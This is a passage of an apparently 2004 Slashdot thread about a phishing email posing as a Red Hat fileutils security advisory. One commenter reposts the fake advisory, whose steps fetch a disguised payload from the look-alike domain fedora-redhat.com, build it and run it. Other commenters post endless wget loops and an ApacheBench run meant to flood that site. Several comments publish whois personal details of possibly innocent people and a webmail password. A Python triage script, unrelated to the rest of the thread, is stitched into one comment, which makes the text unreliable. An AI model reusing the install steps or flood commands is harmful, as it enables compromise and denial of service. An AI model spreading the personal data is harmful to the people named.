    4. Re:wont work by mauryisland · · Score: 1

      You make a valid point about the GPG signatures. There's a problem with the test versions of Fedora, however. Most of the packages in development directories are not signed. That shouldn't bother the users of the official releases, though.

    5. Re:wont work by Anonymous Coward · · Score: 0

      Yum was never officially published by RedHat for anything other than Fedora

      That's why non-Fedora users have up2date.

      RedHat hasn't been publishing security updates for RedHat 9 or earlier for some time now.

      That's what Fedora-Legacy is for.

      newbie home administrators

      Please stop using the word "administrators". By definition anyone with a Linux or FreeBSD machine at home will know their own root password, but that doesn't make them an admin. You have to have other users to be an admin.

    6. Re:wont work by Antique+Geekmeister · · Score: 1

      I've used Gentoo, although I haven't been a developer for it. The idea that you rebuild everything on the fly is not a good one, and encourages this sort of wackiness because to *get* the patches or the features, you often do have to go straight to some weird website out in Timbuktu and rebuild the tarballs yourself on the fly.

  6. I wonder... by bennomatic · · Score: 1, Troll

    ...was this set up by SCO, Microsoft or one of the anti-virus folks who want to prove that Linux isn't without its weaknesses...?

    --
    The CB App. What's your 20?
    1. Re:I wonder... by Anonymous Coward · · Score: 0

      /me straps on his Foil Hat.

      MAYYYYBE!

    2. Re:I wonder... by Anonymous Coward · · Score: 0

      You must be TRYING to get the tin-foil hat award.

    3. Re:I wonder... by Forezt · · Score: 4, Funny

      or better yet, if Microsoft paid the Yankee group to do it for them, and then did an "independent study" on it.

    4. Re:I wonder... by Anonymous Coward · · Score: 0

      wouldn't be surprised if they were...

    5. Re:I wonder... by ForestGrump · · Score: 1

      No, it appears that they outsourced it to Raymond Jackson.

      Domain Name.......... fedora-redhat.com
      Creation Date........ 2004-10-24
      Registration Date.... 2004-10-24
      Expiry Date.......... 2005-10-24
      Organisation Name.... Raymond Jackson
      Organisation Address. 224 Cedar Avenue
      Organisation Address.
      Organisation Address. New York
      Organisation Address. 95301
      Organisation Address. NY
      Organisation Address. UNITED STATES

      Admin Name........... Raymond Jackson
      Admin Address........ 224 Cedar Avenue
      Admin Address........
      Admin Address........ New York
      Admin Address........ 95301
      Admin Address........ NY
      Admin Address........ UNITED STATES
      Admin Email.......... rayjackson23@yahoo.com
      Admin Phone.......... +1.2098994533
      Admin Fax............

      --
      Is it true that more people vote for the winner of American Idol, than vote for the president? -Ali G.
    6. Re:I wonder... by Temporal · · Score: 1

      I guess the Yankees don't have anything better to do this week, do they?

    7. Re:I wonder... by Anonymous Coward · · Score: 0

      dood, why the freak do retards post on slashdot? all these ignorant fucking 'whois info' posts. wow, you're friggin' special. dammit, I'm just sick of the wannabe 'hackers' on here. note that the friggin' domain info is wrong, not to mention that the domain is registered via an Australian registrar (melbourneit.com).
      so there. he's Australian, American, and Romanian.

  7. Here's what WHOIS says: by SIGBUS · · Score: 5, Informative

    [Querying whois.internic.net]
    [Redirected to whois.melbourneit.com]
    [Querying whois.melbourneit.com]
    [whois.melbourneit.com]

    Domain Name.......... fedora-redhat.com
    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533
    Admin Fax............

    Tech Name............ YahooDomains TechContact
    Tech Address......... 701 First Ave.
    Tech Address.........
    Tech Address......... Sunnyvale
    Tech Address......... 94089
    Tech Address......... CA
    Tech Address......... UNITED STATES
    Tech Email........... domain.tech@YAHOO-INC.COM
    Tech Phone........... +1.6198813096
    Tech Fax............. +1.6198813010
    Name Server.......... yns1.yahoo.com
    Name Server.......... yns2.yahoo.com

    --
    Oh, no! You have walked into the slavering fangs of a lurking grue!
    1. Re:Here's what WHOIS says: by barzok · · Score: 2, Informative

      95301 is Atwater, CA. There are at least 2 Cedar Avenues in NY (Staten Island and The Bronx), and one in Atwater.

    2. Re:Here's what WHOIS says: by datastalker · · Score: 3, Informative

      That phone number by area code and exchange is for Milton, CA, so chances are the entire WHOIS record is false.

    3. Re:Here's what WHOIS says: by Shandon · · Score: 2, Informative

      Data looks contradictory, but also be wary of the joe-job. Raymond Jackson may be an unpopular name to have right about now...

    4. Re:Here's what WHOIS says: by Ann+Coulter · · Score: 1

      Did anyone save an e-mail from this guy? If this whois is fake, maybe the e-mail can tell us more. Just a thought.

    5. Re:Here's what WHOIS says: by bconway · · Score: 2, Informative

      Don't forget the domain that the script emails, root@addlebrain.com:

      Found a referral to whois.enom.com.

      Registration Service Provided By: StoreIQ, Inc.
      Contact: technical@storeiq.com
      Visit:

      Domain name: addlebrain.com

      Registrant Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Administrative Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Technical Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Billing Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Status: Locked

      Name Servers:
      dns1.name-services.com
      dns2.name-services.com
      dns3.name-services.com
      dns4.name-services.com
      dns5.name-services.com

      Creation date: 18 Feb 2000 17:02:59
      Expiration date: 18 Feb 2005 17:02:59

      --
      Interested in open source engine management for your Subaru?
    6. Re:Here's what WHOIS says: by ironfrost · · Score: 3, Insightful

      There IS a Raymond Jackson that lives at that address (except that it's in CA rather than NY, as has been previously noted) so it's not completely made up. Although, whether he's really the perpetrator or simply someone the real criminal doesn't get on with is still a matter of doubt. In any case, all his details (including e-mail address and phone number) can be easily found from a Google search - he runs a chapter of a Historical Miniatures Gaming Society in his area (HMGS West, near the bottom of the page).

    7. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      I did a search for that address with that zip code and found one website (and a mapquest link) and the website had a man named Raymond James Jackson. http://www.hmgs.org/pocs.htm (at the bottom of the page).

    8. Re:Here's what WHOIS says: by DrLZRDMN · · Score: 2, Interesting

      yes but which Raymond Jackson?

      One's a teacher, one is guilty of child abuse (something to be unpopular for) and one just lost a football game today (/thinks of Ace Ventura plot)

    9. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 5, Funny

      Don't forget the domain that the script emails, root@addlebrain.com

      Sorry to disappoint you, but I doubt he owns the domain - they offer free webmail, so it's likely he just signed up for an account. Presumably they didn't stop anyone from getting the username 'root' - I signed up for 'administrator' just now (password 'monkey' if you don't believe me) with no problems.

    10. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      Isn't this domain a pretty clear violation of copyright laws? I mean, it is quite patently designed to deceive consumers into believing that it is the legitimate website of "Fedora Redhat". Unlike say, fedora-redhat-sucks.com, which has a 1st Amendment right to talk about fedora-redhat, or fedora-redhat-discussion.com, which has a fair use to talk about redhat, so long as it doesn't confuse consumers, this website is blatantly and maliciously attempting to confuse consumers. WHOIS/InterNIC or whoever should pull the plug and put up a notice explaining that it has been removed pending arbitration (which of course, this site should lose).

      The same thing goes for all those paypal-security.com and pa1(one)pal.com websites. The domain name registrars shouldn't have authorized the names in the first place and should pull the plug when notified.

    11. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      From previous reports, the patch was originally hosted at www.stanford.edu/~joeio - the user is Irene Joe, a graduate law student at Stanford.

      I can't imagine that anyone would be stupid enough to link themselves with this so obviously, so the person behind all this must have hijacked her account. Perhaps he/she hijacked Mr Jackson's as well?

    12. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      (password 'monkey' if you don't believe me)

      I will confirm that the parent AC was right. But I just couldn't stand it so I changed it before someone even more anonymous than I did, which was bound to happen. Somehow it just didn't seem ethical not to change it and leave it exposed for abuse. Now what do you recommend I do?

    13. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      "That phone number by area code and exchange is for Milton, CA, so chances are the entire WHOIS record is false."

      Milton? Google sez Milton is area code 209, and so is Atwater. Atwater has a Raymond Jackson at 224 Cedar Avenue.

      "Bummer of a birthmark, Hal."

      If you're going to falsify records, doing it with real info certainly slows down the chase a bit. I hope Mr Jackson isn't too inconvenienced when he's paused for questioning.

      Curious that much works out though. Might give a bit of a lead; i.e., the perp may not have picked this guy out of a hat. Kinda odd having it all that close but a different number.

      Reverse lookup no result. Could be a cell phone.

    14. Re:Here's what WHOIS says: by wpc4 · · Score: 1

      Dialed the #, big surprise. It's disconnected.

    15. Re:Here's what WHOIS says: by zogger · · Score: 1

      that's one of my favorite far sides

    16. Re:Here's what WHOIS says: by TheLittleJetson · · Score: 1

      That phone number by area code and exchange is for Milton, CA, so chances are the entire WHOIS record is false.

      Actually, it's a typo. I've been meaning to fix it...

    17. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      email the admin and tell them that usernames that refer to administrative roles should not be available to everyone.

    18. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      209 is the Fresno area's area code before the 209/559 split a few years back.

      As a Raymond from Fresno, I am explicitly condemning this action.

    19. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      Isn't this domain a pretty clear violation of copyright laws?

      No, but it's a violation of trademark laws. A nit? Sure, but it's a mistake people make way too often.

      And yeah, if it's not going away otherwise, RH can probably pull the plugs with that, but it might take some time, I wouldn't be so sure notice is enough, it might, since this is so clear, and they ought to play nice, but AFAIK there's nothing like DMCA here that would actually force registrars to bend over without a court battle.

    20. Re:Here's what WHOIS says: by petrus4 · · Score: 1

      I suspect Mr Raymond Jackson could be in for a visit from the proverbial Men In Black by the end of the week. *evil grin*

    21. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      Well the HMGS did come in for some abuse and turmoil over internal politics earlier this year. Perhaps it's a hit-Rumanian wargamer geek with a grudge

    22. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      Yes, but it shouldn't be a matter of not wanting to bend over-- the registrars should be good citizens and not accept money for domains like pa1pal-security.com, since doing so knowingly makes them morally (if not legally) accessories to the crime. When shit like this gets pulled, the registrars should clear it up as soon as they find out about it.

      As I said before, paypal-sucks.com is free speech and paypal-discussion.com (if properly labeled as not affiliated with paypal.com) is fair use, but stuff like redhat-fedora.com is malicious fraud, and the registrars have a responsibility to help clear it up.

    23. Re:Here's what WHOIS says: by hoofie · · Score: 1

      Another email address : madhi_ray@hotmail.com

      Warning : This MAY NOT be the right person...

    24. Re:Here's what WHOIS says: by k4_pacific · · Score: 1

      I had some similar fun with a Nigerian scammer once that way. I pretended to be interested in his offer and I went to his free email provider and signed up as mail-admin, and sent him an email telling him his account is being monitored for illegal activity and threatening to close his account. Because of this, each time he contacted me, he politely asked me to email him at a new address. I'd send the same threatening form letter to the new address from "mail-admin". He apparently figured it out and gave up after a few iterations.

      --
      Unknown host pong.
    25. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      the registrars should be good citizens and not accept money for domains like pa1pal-security.com

      They should of course, but such is the world we live in, that nobody seems to care about anything but money.

      Looks like it's no more, so someone managed to get it down, or they actually did the right thing, but I don't think so...

    26. Re:Here's what WHOIS says: by Spice-Doctor · · Score: 1

      Caught wind of this at TMP. Slashdot is cool. Now how did HMGS get involved? I am a Life member and a founder of a couple of chapters. Curious?

    27. Re:Here's what WHOIS says: by Anonymous Coward · · Score: 0

      It's probably way too late for you to be reading this, but just in case you've got e-mail reply turned on: HMGS isn't involved at all. It's just that the guy happens to have all his information (which matches up with the ones in the domain registration, but also provides more detail) on that webpage, due to him running a chapter of HMGS.

  8. In case the site goes down.. by Anonymous Coward · · Score: 0

    Original issue date: October 20, 2004
    Last revised: October 20, 2004
    Source: RedHat

    A complete revision history is at the end of this file.

    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

    The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

    * First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
    * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
    * cd fileutils-1.0.6.patch
    * make
    * ./inst

    Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

    Thank you for your prompt attention to this serious matter,

    RedHat Security Team.

    Copyright © 2004 Red Hat, Inc. All rights reserved.

    -
    http://www.freestuffguide.net/

    1. Re:In case the site goes down.. by marmoset · · Score: 1

      I got a similar phish yesterday, only pointing to www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz. I guess that was the earlier draft, before they secured the more impressive domain name.

    2. Re:In case the site goes down.. by russsell · · Score: 1

      a quick search reveals...
      joeio@stanford.edu appears to be for a student called Irene Joe ... and Irene seems to be studying Law!

    3. Re:In case the site goes down.. by Anonymous Coward · · Score: 0

      Black Law Students Association???

      Holy fuck, they're studying the Law of the Jungle! At Stanford! Stop this world, I'm getting off.

    4. Re:In case the site goes down.. by Drantin · · Score: 1

      by googling...

      "Please contact me by email joeio@stanford.edu or by phone (650) 497-6154 "

      --
      Actio personalis moritur cum persona. (Dead men don't sue)
  9. Real link? by chrispyman · · Score: 5, Insightful

    Why not just use the real link and slashdot their site into oblivion!

    1. Re:Real link? by JamesTRexx · · Score: 1

      I see great slashdotters think alike. :-)

      --
      home
    2. Re:Real link? by crow · · Score: 3, Informative

      It looks like it's probably hosted by Yahoo!

      traceroute www.fedora-redhat.com
      traceroute: Warning: www.fedora-redhat.com has multiple addresses; using 66.218.79.149
      traceroute to premium4.geo.yahoo.akadns.net (66.218.79.149), 30 hops max, 38 byte packets

      I'm getting about 3MB/s right now. We won't slashdot the server, but we may well use up the bandwidth quota that this person bought.
    3. Re:Real link? by Shandon · · Score: 1

      Hmmm. The "real link" points to an address in Yahoo's Webhosting address space.

      vimes:~$ hostx fedora-redhat.com
      fedora-redhat.com A 66.218.79.148
      fedora-redhat.com A 66.218.79.149
      fedora-redhat.com A 66.218.79.155
      fedora-redhat.com A 66.218.79.147

      vimes:~$ hostx 66.218.79.148
      Name: p4w2.geo.scd.yahoo.com
      Address: 66.218.79.148

      Arin sez:

      NetRange: 66.218.64.0 - 66.218.95.255
      CIDR: 66.218.64.0/19
      NetName: A-YAHOO-U23
      NetHandle: NET-66-218-64-0-1
      Parent: NET-66-0-0-0-0
      NetType: Direct Allocation
      . . .

      Their servers might be harder to slashdot than the average bear's ... I've tried to find an explicit abuse@ address for the Yahoo webhosting biz, but there's nothing but that nasty little Customer Care form that doesn't even provide for making a complaint against the webhosting users. I got something accepted, but I'm not sure what'll be done, when.

      -- shandon

    4. Re:Real link? by jesser · · Score: 1

      They wanted to see if they could Slashdot Slashdot.

      --
      The shareholder is always right.
    5. Re:Real link? by vi-rocks · · Score: 1

      Yes, it does look like Yahoo... check the last line of the HTML source.

      <!-- text below generated by server. PLEASE REMOVE --><!-- Counter/Statistics data collection code --><script language="JavaScript" src="http://hostingprod.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.webhosting.yahoo.com/visit.gif?us1098667747" alt="setstats" border="0" width="1" height="1"></noscript>
    6. Re:Real link? by acidblood · · Score: 2, Interesting

      This seems like a very good idea. Normally I wouldn't be for vigilante justice, but this guy deserves it.

      I'm running the following script on my box, and I recommend others to do the same.

      while true; do wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz ; rm fileutils-1.0.6.patch.tar.gz; done

      If enough people do the same, either the site is taken offline, or we're gonna cost him a pretty penny.

      --

      Join the NFSNET. Our prime goal is making little numbers out of big ones. http://www.nfsnet.org/

    7. Re:Real link? by Anonymous Coward · · Score: 0

      No need to write to the hard drive:

      while true; do wget -O - www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz ; done > /dev/null

    8. Re:Real link? by Saeger · · Score: 2, Funny

      And I think I'll "benchmark" the site a few million times.

      /usr/sbin/ab2 -n 10000000 -c 10 'http://www.fedora-redhat.com/?you=asshole&garbage=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
      This is ApacheBench, Version 2.0.40-dev <$Revision: 1.121.2.8 $> apache-2.0
      Copyright (c) 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
      Copyright (c) 1998-2002 The Apache Software Foundation, http://www.apache.org/

      Benchmarking www.fedora-redhat.com (be patient)

      --
      Power to the Peaceful
    9. Re:Real link? by supermonkeyball · · Score: 1

      So /.'ing the site won't work, but if the web admins at Red Hat want to have a little fun, then might I suggest you change the image of http://www.redhat.com/g/chrome/logo_rh_home.png (check the image link on the fedora-redhat.com site) to say something to warn others about the phish?

      Or just exchange that with hello.jpg (think goatse)

      --
      My sig can beat up your sig
    10. Re:Real link? by Saeger · · Score: 3, Funny

      I guess I should have viewed the source of that site before I fired that line off, seeing as the site hotlinks an image on redhat.com.

      Oops.

      --
      Power to the Peaceful
    11. Re:Real link? by irc.goatse.cx+troll · · Score: 1

      Why don't they just replace the image with some mod_rewrite magic (or cgi/php) to check the referer, and if it's referred from that site, put up a huge Ackbar DON'T DOWNLOAD IT, IT'S A TRAP?

      Surely redhat engineers should know how to do that, if not, just ask anyone in #GNAA how to redirect an image.

      --
      Pain lasts, kid. It's how you know you're alive. Sometimes I think this growing up thing is just pain management -TheMaxx
    12. Re:Real link? by Anonymous Coward · · Score: 0

      That's a good idea. Why don't you suggest it to them, rather than posting it to slashdot?

    13. Re:Real link? by Anonymous Coward · · Score: 0

      Ran this for a few hours. Site's gone now. :)

    14. Re:Real link? by B2382F29 · · Score: 1

      Try

      while true; do wget -O /dev/null www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz; done

      that way it doesn't use up disk space.
      --
      Move Sig. For great justice.
  10. Security only works when you know what to check by LostCluster · · Score: 3, Insightful

    Red Hat's reply to this issue is pretty straight-forward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.

    However, what good is that against Joe User who falls for the bait and thinks the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals", and so they don't see any red flags indicating that this is bogus.

    It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absence of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
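
What "knowing what to check" looks like when written down, as an added example that is not Red Hat's code: a small triage pass over a mailed "advisory" that flags the three tells this thread identifies, a link to a look-alike vendor domain, an instruction to fetch and run a freshly unpacked binary, and no mention of any signature or checksum to verify. The trusted-domain set, the vendor-name tokens, the regular expressions and the two-label "registrable domain" rule are assumptions for the illustration (a real deployment would use a public-suffix list); the first sample is the fake advisory quoted in this thread, abridged, and the second is a constructed benign notice.

```python
"""Triage a mailed 'security advisory' for the tells that mark this one as fake.

Added example, not Red Hat's code. The trusted-domain set, the vendor name
tokens and the heuristics are assumptions for illustration; the two-label
"registrable domain" rule stands in for a public-suffix list.
"""
import re

TRUSTED_VENDOR_DOMAINS = {"redhat.com"}          # assumption; fedora.redhat.com falls under it
VENDOR_TOKENS = ("redhat", "red-hat", "fedora")   # names a look-alike domain would borrow

URL_RE = re.compile(
    r"(?:https?://)?\b((?:[a-z0-9-]+\.)+(?:com|org|net|edu))\b(?:/[^\s'\"<>]*)?", re.I)
FETCH_RE = re.compile(r"\b(wget|curl|download)\b", re.I)
RUN_LOCAL_RE = re.compile(r"(?<![\w/])\./[\w.-]+")  # "./inst": run what was just unpacked
VERIFY_RE = re.compile(
    r"\b(gpg|pgp|signature|signed|md5sum|sha1sum|sha256sum|checksig)\b", re.I)


def registrable_domain(host):
    """Last two labels of a host name (assumption: good enough without a public-suffix list)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def extract_hosts(text):
    """Host names of every URL-looking token in the message, in order of appearance."""
    return [m.group(1).lower() for m in URL_RE.finditer(text)]


def lookalike_domains(hosts):
    """Domains that borrow a vendor name but are not the vendor's own domain."""
    found = []
    for host in hosts:
        domain = registrable_domain(host)
        if domain in TRUSTED_VENDOR_DOMAINS or domain in found:
            continue
        if any(token in domain for token in VENDOR_TOKENS):
            found.append(domain)
    return found


def triage(message):
    """Return the indicators found and a verdict; 'suspicious' on any look-alike domain,
    or on fetch-and-run instructions that offer nothing to verify the download against."""
    hosts = extract_hosts(message)
    lookalikes = lookalike_domains(hosts)
    download_and_run = bool(FETCH_RE.search(message) and RUN_LOCAL_RE.search(message))
    mentions_verification = bool(VERIFY_RE.search(message))
    suspicious = bool(lookalikes) or (download_and_run and not mentions_verification)
    return {
        "hosts": hosts,
        "lookalike_domains": lookalikes,
        "download_and_run": download_and_run,
        "mentions_verification": mentions_verification,
        "verdict": "suspicious" if suspicious else "ok",
    }


# Sample 1: the fake advisory quoted in this thread (abridged).
FAKE_ADVISORY = """\
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote
attacker to execute arbitrary code with root privileges.
* First download the patch from the Stanford RedHat mirror:
  wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst
Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
"""

# Sample 2: constructed benign notice of the shape a signed vendor update uses.
BENIGN_NOTICE = """\
Updated fileutils packages are available from www.redhat.com.
Verify the GPG signature of each package with rpm --checksig before installing.
"""

if __name__ == "__main__":
    for name, msg in (("fake", FAKE_ADVISORY), ("benign", BENIGN_NOTICE)):
        print(name, triage(msg))
```

On the fake advisory the pass reports `fedora-redhat.com` as a look-alike (the genuine `www.fedora.redhat.com` mentioned in the same message resolves to the trusted `redhat.com`), sees both a fetch instruction and `./inst`, and finds no word about signatures or checksums; the benign notice trips none of those. The heuristics are deliberately crude, which is the point of the parent comment: an experienced user runs this checklist in their head, and a newcomer does not know it exists.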

    1. Re:Security only works when you know what to check by Anonymous Coward · · Score: 0

      Of course, I'm all for cleaning this up. Shall we be using Uzis or AK-47s to dispose of the idiots?

    2. Re:Security only works when you know what to check by OmegaBlac · · Score: 2, Insightful

      It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.

      Yet that hasn't stopped Windows from being ready for "desktop primetime", huh? There will always be dim-witted joe users who will get burnt by these lame social engineering scams regardless of the OS. These very well could be the same people who will be taken advantage of offline as well. Linux is already on the desktop. It has been ready for primetime for a while. Of course there is nothing it can do to protect the user from the biggest security threat of them all: the user themselves.
    3. Re:Security only works when you know what to check by LnxAddct · · Score: 1

      Well, for one, Fedora by design is very non-root centric and I don't believe any user will typically be running as root. There is no need for an average user to ever be root; even up2date just asks for the root password when you double click it. Because of this, adduser as well as most (all) of the other commands aren't in your path and all this spits out is a bunch of "bash: adduser: command not found". Even if it was in your path, you don't have permission to run it. As long as you're not running as root this particular virus still isn't a problem, although that's not to say that future variations won't be. I assume Yahoo and Red Hat will take care of this quickly and whatever Romanian (in one of the other threads it was pretty much confirmed that's where this originated from) is going to be dealt with.
      Regards,
      Steve

    4. Re:Security only works when you know what to check by Anonymous Coward · · Score: 0

      Red Hat should be pursuing the culprit for trademark infringement. Committing fraud using the identity of a well-known company is incredibly stupid.

  11. Whois by rsrsharma · · Score: 1, Funny

    Whois of fedora-redhat.com:

    Domain Name.......... fedora-redhat.com
    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533
    Admin Fax............

    Tech Name............ YahooDomains TechContact
    Tech Address......... 701 First Ave.
    Tech Address.........
    Tech Address......... Sunnyvale
    Tech Address......... 94089
    Tech Address......... CA
    Tech Address......... UNITED STATES
    Tech Email........... domain.tech@YAHOO-INC.COM
    Tech Phone........... +1.6198813096
    Tech Fax............. +1.6198813010
    Name Server.......... yns1.yahoo.com
    Name Server.......... yns2.yahoo.com

    Looks like somebody's gonna get arrested. ;)

    1. Re:Whois by suckmysav · · Score: 1

      > Looks like somebody's gonna get arrested. ;)

      Let's all hope that one day some Russian gangster picks your name out of his Random-Grab-Bag of names and uses it in a phishing scam.

      Then you might understand the wisdom of "innocent until proven guilty"

      --
      "You can't fight in here, this is the war room!"
  12. Finally... by Seabass55 · · Score: 1

    Something that will weed out dumb linux users just like most all Windows viruses attack the dumb windows users.

    1. Re:Finally... by JamesTRexx · · Score: 1

      Maybe we should stop using virusscanners and do like nature, those that survive all the diseases will evolve into a better species (of users).

      --
      home
    2. Re:Finally... by Fapestniegd · · Score: 5, Funny

      Debian has been weeding out incompetent users with its "impossible to use" installer for years.

      It keeps the "Mandrake Crew" off of the debian-users lists.

    3. Re:Finally... by Shulai · · Score: 1

      The difference is, Linux still stands against most attacks that even smart Windows users are vulnerable to, such as early infections by worms not yet in antivirus databases.

    4. Re:Finally... by KiloByte · · Score: 1

      The Woody installer isn't "impossible to use"! I always boot it, mkfs, ftp down my pre-installed tarball and go on.

      Oh, wait...

      --
      The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
  13. Stupid Tricks? by dj_cel · · Score: 5, Interesting

    It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of Windows users, but as the audience of Linux is mostly tech-savvy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average PC skills from destroying their systems?

    --
    Those who can make you believe absurdities can make you commit atrocities. - Voltaire
    1. Re:Stupid Tricks? by stratjakt · · Score: 1, Informative

      I wouldn't say the audience of linux is tech-savvy, they just think they are.

      The stupidest people I've ever met are the ones who think they know everything. Your average 14 year old who installs gentoo and now considers himself a giant in the world of computing fits the bill. I've suggested rm -rf / (logged in as root, of course) as a solution to email routing problems, and they do it.

      They'd easily fall for this. More easily, I'd say, than the average clueless user, since many of them are slightly technophobic. You just have to tickle their egos. Put some big technical sounding words and acronyms in the email, and they'll suck it down.

      --
      I don't need no instructions to know how to rock!!!!
    2. Re:Stupid Tricks? by dj_cel · · Score: 1

      This is exactly what I'm talking about though, I myself am in no way an expert or even close, but as a community we need to address these types of issues. I may sound like a pussy or something, but I want to have the position that we are a community moving towards a goal, ending the monopoly that runs most of our lives. It would be better to inform the young minds of proper ways and techniques of using Linux than to slam them; putting them in their place is one thing, but with the other type of mentality, we drive away the very people that will help us in the future of the software revolution. Another thing, these kids will ultimately move their parents and friends who are less skillful at using a computer to other platforms, that's why I emphasize the necessity to train them properly, build in security systems that are logical (if I'm speaking nonsense let me know, I'm not an admin!) to "most" and by most I mean your parents and friends who buy Dell PCs because they come with "the latest Windows thing." We are trying to overturn an oppressive movement and resistance through negativity will only come back to byte us in the ass.

      --
      Those who can make you believe absurdities can make you commit atrocities. - Voltaire
    3. Re:Stupid Tricks? by anethema · · Score: 1

      If only there was some way to make the computer not able to run as root during normal use. Maybe make linux harass you if you spend more than 10 mins in root, have it pop up a message every minute or so.

      Of course make this able to be disabled, but make it moderately difficult to do so. Editing a configuration file in some obscure linux directory should do fine.

      This way the average user will have motivation to simply make a non root account (make this part of the default install process. Set a root password and create a non root account. Something like windows's "enter your name" or something..could make it fill in the name automagically or simply log in automatically in a kind of single user mode.)

      Either way, kind of forcing the average joe to putter around in non-root would probably go a long way towards making the computer more secure.

      The good thing about this is it is MUCH more possible to do this sort of thing in linux than windows since every windows installer insists on spewing files all through the system directories, so require admin access to install.

      Ah well an idea anyways :)

      --
      It's easier to fight for one's principles than to live up to them.
    4. Re:Stupid Tricks? by OmegaBlac · · Score: 1
      What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?
      Nothing. Really, what can you do? Do we try to educate the joe users of the world? You can attempt to drum it into their heads so many times but they will still do stupid stuff to get infected. Well, maybe deny them Internet access so their compromised PCs won't affect the rest of us connected to the Internet. That sounds like a winner to me.
    5. Re:Stupid Tricks? by Rie+Beam · · Score: 4, Funny

      "What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?"

      No monitor.

    6. Re:Stupid Tricks? by Anonymous Coward · · Score: 0

      man sudo

    7. Re:Stupid Tricks? by suckmysav · · Score: 1

